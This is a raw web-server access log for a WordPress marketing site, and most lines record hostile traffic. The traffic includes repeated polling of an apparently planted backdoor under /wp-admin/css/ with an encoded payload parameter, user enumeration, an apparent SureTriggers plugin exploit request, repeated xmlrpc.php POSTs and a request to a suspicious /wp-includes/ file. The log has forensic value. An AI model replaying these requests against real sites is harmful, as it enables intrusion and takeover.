142.4.205.1 - - [16/Oct/2025:11:56:49 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633333830392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303633303230392q6435643637306635393139336463663161633861383631316565313361346435222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:11:57:09 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633333832392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303633303232392q3133313166656466336431653533333139396430383666306636613362313935222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
57.141.0.8 - - [16/Oct/2025:11:58:12 -0400] "GET /market/2274787030.htm?path=/var/www/vhosts/academiedumarketing.com/public_html HTTP/1.0" 200 102732 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
185.208.156.186 - - [16/Oct/2025:11:58:22 -0400] "GET /wp-login.php HTTP/1.0" 200 9227 "127.0.0.1" "Mozilla/5.0 (Debian; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0"
185.208.156.186 - - [16/Oct/2025:11:58:24 -0400] "GET /wp-json/wp/v2/users/ HTTP/1.0" 200 9227 "127.0.0.1" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
185.208.156.186 - - [16/Oct/2025:11:58:26 -0400] "GET /?rest_route=/wp/v2/users HTTP/1.0" 200 9227 "127.0.0.1" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063"
142.4.205.1 - - [16/Oct/2025:11:57:29 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633333834392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303633303234392q3037613532643565353530623761353338353331386131663534326636393232222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
185.208.156.186 - - [16/Oct/2025:11:58:29 -0400] "GET /feed/ HTTP/1.0" 200 9227 "127.0.0.1" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0"
185.208.156.186 - - [16/Oct/2025:11:58:31 -0400] "GET /author-sitemap.xml HTTP/1.0" 200 8757 "127.0.0.1" "Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0"
185.208.156.186 - - [16/Oct/2025:11:58:38 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.0" 200 10462 "127.0.0.1" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
185.208.156.186 - - [16/Oct/2025:11:58:38 -0400] "GET /membership-registration/ HTTP/1.0" 200 9227 "127.0.0.1" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
185.208.156.186 - - [16/Oct/2025:11:58:38 -0400] "POST /wp-json/sure-triggers/v1/connection/create-wp-connection HTTP/1.0" 200 9227 "127.0.0.1" "OttoKit"
185.208.156.186 - - [16/Oct/2025:11:58:38 -0400] "GET / HTTP/1.0" 200 9227 "127.0.0.1" "Mozilla/5.0 (Fedora; Linux x86_64; rv:135.0) Gecko/20100101 Firefox/135.0"
185.208.156.186 - - [16/Oct/2025:11:58:40 -0400] "POST / HTTP/1.0" 200 9227 "127.0.0.1" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.5 Safari/605.1.15"
216.73.216.189 - - [16/Oct/2025:11:58:46 -0400] "GET /category/uncategorized?path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fpublic_html%2Fwp-content%2Fuploads%2F2023%2F04 HTTP/1.0" 200 6776 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
142.4.205.1 - - [16/Oct/2025:11:57:49 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633333836392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303633303236392q3734623663313930363435363239336234616435353566626265383630356636222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
114.119.152.60 - - [16/Oct/2025:11:58:50 -0400] "GET /2019/09/06/hello-world/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-admin/css/colors/light HTTP/1.0" 200 7270 "https://academiedumarketing.com/2019/09/06/hello-world/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-admin/css/colors" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
185.208.156.186 - - [16/Oct/2025:11:58:55 -0400] "GET /wp-login.php HTTP/1.0" 200 9227 "127.0.0.1" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
142.4.205.1 - - [16/Oct/2025:11:58:09 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633333838392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303633303238392q6630313430653339663339656238613534323331333132353239326232313762222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
216.73.216.189 - - [16/Oct/2025:11:59:23 -0400] "GET /category/uncategorized?path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fpublic_html%2Fwp-content%2Fuploads%2F2023%2F11 HTTP/1.0" 200 6775 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
142.4.205.1 - - [16/Oct/2025:11:58:29 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633333930392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303633303330392q3536353064623431303830643465616562346634633935363230383065373464222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
154.53.62.61 - - [16/Oct/2025:11:59:46 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299"
142.4.205.1 - - [16/Oct/2025:11:58:49 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633333932392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303633303332392q6337613266363666353633653732316136326230313362353565616166353732222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
154.53.62.61 - - [16/Oct/2025:11:59:50 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299"
154.53.62.61 - - [16/Oct/2025:11:59:54 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299"
154.53.62.61 - - [16/Oct/2025:12:00:01 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299"
154.53.62.61 - - [16/Oct/2025:12:00:07 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299"
142.4.205.1 - - [16/Oct/2025:11:59:09 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633333934392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303633303334392q3033343038666237383366333438653661303864663536313432626536316431222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
154.53.62.61 - - [16/Oct/2025:12:00:12 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299"
142.4.205.1 - - [16/Oct/2025:11:59:29 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633333936392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303633303336392q3734636130613335306365383134313431373532356362383639306166623364222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.195 - - [16/Oct/2025:12:00:46 -0400] "GET /?_g=1215567 HTTP/1.0" 200 24168 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [16/Oct/2025:11:59:49 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633333938392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303633303338392q3133653161303838393163363036386537643932316438363061626239333233222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
216.73.216.189 - - [16/Oct/2025:12:00:58 -0400] "GET /category/uncategorized?path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fpublic_html%2Fwp-content%2Fuploads%2F2023%2F01 HTTP/1.0" 200 6775 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
142.4.205.1 - - [16/Oct/2025:12:00:09 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633343030392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303633303430392q6136653539656337386661623733363937643739336638376634363531383466222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
216.73.216.189 - - [16/Oct/2025:12:01:15 -0400] "GET /category/uncategorized?path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fpublic_html%2Fwp-content%2Fuploads%2F2023%2F12 HTTP/1.0" 200 6775 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
142.4.205.1 - - [16/Oct/2025:12:00:29 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633343032392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303633303432392q3639373832346636383162383136313864383633333536613762363464656131222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
216.73.216.189 - - [16/Oct/2025:12:01:40 -0400] "GET /category/uncategorized?path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fpublic_html%2Fwp-content%2Fuploads%2F2023%2F06 HTTP/1.0" 200 6776 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
142.4.205.1 - - [16/Oct/2025:12:00:49 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633343034392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303633303434392q6133633561623262623133373765353133383830303363326137303764646565222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:12:01:09 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633343036392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303633303436392q3433356534623336663934663866643639336661666436646234393566633834222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
45.227.253.15 - - [16/Oct/2025:12:02:09 -0400] "GET /index.php/jk HTTP/1.0" 200 4187 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:103.0) Gecko/20100101 Firefox/103.0"
142.4.205.1 - - [16/Oct/2025:12:01:29 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633343038392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303633303438392q3863393936653237353962316132313631613830303938343934393338393338222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:12:01:49 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633343130392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303633303530392q3161633862313138393036366133373935626137363932643332633331393139222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:12:02:09 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633343132392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303633303532392q3031376265366237383732663761653364303430623963373461353436343639222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
216.73.216.189 - - [16/Oct/2025:12:03:27 -0400] "GET /category/uncategorized?path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fpublic_html%2Fwp-content%2Fuploads%2F2023%2F05 HTTP/1.0" 200 6776 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
142.4.205.1 - - [16/Oct/2025:12:02:29 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633343134392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303633303534392q3036303834396333393931343138326331363264306166303761323931643965222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:12:02:49 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633343136392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303633303536392q3339623435313864646331343538386235306331643037646438303839316465222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:12:03:09 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633343138392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303633303538392q3564653934613732376461306563646637376136306637346238343431633631222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
204.12.208.18 - - [16/Oct/2025:12:04:13 -0400] "GET /wp-includes/wpdc3def/index.php HTTP/1.0" 200 4154 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7"
142.4.205.1 - - [16/Oct/2025:12:03:29 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633343230392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303633303630392q6361643636363861326130323662336532656135303539323361303161613639222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
57.141.0.73 - - [16/Oct/2025:12:04:32 -0400] "GET /market/2274703822.htm HTTP/1.0" 200 102732 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
61.219.140.50 - - [16/Oct/2025:12:04:45 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
142.4.205.1 - - [16/Oct/2025:12:03:49 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303633343232392p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303633303632392q3537636232383361623362393532396163663166303932663432353135623661222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
